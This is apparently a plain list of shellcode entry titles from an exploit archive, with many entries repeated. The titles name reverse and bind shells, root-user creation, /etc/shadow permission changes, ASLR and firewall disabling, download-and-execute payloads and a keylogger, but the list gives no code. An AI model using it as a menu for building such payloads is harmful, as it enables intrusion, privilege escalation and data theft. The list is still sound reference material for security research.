Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)
Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)
Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)
Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)
Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)
Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)

Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)

ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)
Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)
Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)
Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)
Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)
Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)
Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)

Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)

Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)

Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode
Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode

Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode
Windows x86 - Eggsearch Shellcode (33 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
Windows x86 - Eggsearch Shellcode (33 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)

Linux/x86 - Disable ASLR Security Shellcode (83 bytes)
Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)
Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)

Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)
Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)
Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)
Linux/x86 - execve /bin/dash Shellcode (42 bytes)
Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)
Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)
Linux/x86 - execve /bin/dash Shellcode (42 bytes)
Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)

Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)
Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)
Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)
Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)
Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)

Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)

MIPS (Little Endian) - system() Shellcode (80 bytes)
Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)
Linux/x86 - Egghunter Shellcode (31 bytes)
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode
Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)
Linux/x86 - Egghunter Shellcode (31 bytes)
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode
Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)

Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)
Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir Shellcode (37 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir Shellcode (37 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)
Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)
Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)
Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)
Linux/x86 - Disable ASLR Security Shellcode (84 bytes)
Linux/x86 - Egghunter Shellcode (20 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)
Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)
Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)
Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)
Linux/x86 - Disable ASLR Security Shellcode (84 bytes)
Linux/x86 - Egghunter Shellcode (20 bytes)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)
Linux/x86 - execve /bin/sh Shellcode (35 bytes)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Shellcode (57 bytes)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)
Linux/x86 - execve /bin/sh Shellcode (35 bytes)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Shellcode (57 bytes)
Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)
Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)
Linux/x86 - exit(0) Shellcode (6 bytes)
Linux/x86 - execve /bin/sh Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)
Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)
Linux/x86 - Read /etc/passwd Shellcode (58 bytes)
Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)
Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)
Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)
Linux/x86 - Download File + Execute Shellcode
Linux/x86 - Reboot Shellcode (28 bytes)
Linux/x86 - execve /bin/sh Shellcode (23 bytes)
Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)
Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)
Linux/x86 - exec /bin/dash Shellcode (45 bytes)
Linux/x86-64 - execve Encoded Shellcode (57 bytes)
Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter Shellcode (19 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode
Windows 2003 x64 - Token Stealing Shellcode (59 bytes)
Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)
Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)
Linux/x86 - exit(0) Shellcode (6 bytes)
Linux/x86 - execve /bin/sh Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)
Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)
Linux/x86 - Read /etc/passwd Shellcode (58 bytes)
Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)
Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)
Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)
Linux/x86 - Download File + Execute Shellcode
Linux/x86 - Reboot Shellcode (28 bytes)
Linux/x86 - execve /bin/sh Shellcode (23 bytes)
Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)
Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)
Linux/x86 - exec /bin/dash Shellcode (45 bytes)
Linux/x86-64 - execve Encoded Shellcode (57 bytes)
Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter Shellcode (19 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode
Windows 2003 x64 - Token Stealing Shellcode (59 bytes)

Linux/x86 - execve /bin/bash Shellcode (31 bytes)

Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)
Linux/x86-64 - execve Shellcode (22 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Linux/x86-64 - Egghunter Shellcode (24 bytes)
Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)
Linux/x86-64 - execve Shellcode (22 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Linux/x86-64 - Egghunter Shellcode (24 bytes)
Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)
Linux/x86-64 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)
Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)
Linux/x86-64 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)
Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)
Linux/x86 - Download File + Execute Shellcode (135 bytes)
Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)
Linux/x86 - Download File + Execute Shellcode (135 bytes)
Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)
Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)
Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)
Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)
Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)
Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)
Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)
Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)
Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)
Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)
Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)
Windows x86 - system(_systeminfo_) Shellcode (224 bytes)
Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)
Windows x86 - system(_systeminfo_) Shellcode (224 bytes)
Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)
Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode
Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)
Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)
Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)
Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode
Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)
Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)
Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/x86 - execve /bin/sh Shellcode (19 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)
Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)
Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)
Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir Shellcode (25 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)
Linux/x86 - execve /bin/sh Shellcode (19 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)
Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Windows x86 - MessageBoxA Shellcode (242 bytes)
Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)
Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)
Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)
Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir Shellcode (25 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)

Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)
Linux/x86-64 - Egghunter Shellcode (38 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)
Windows x86 - Hide Console Window Shellcode (182 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)
Linux/x86 - execve /bin/dash Shellcode (30 bytes)
Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)
Linux/x86-64 - Egghunter Shellcode (38 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)
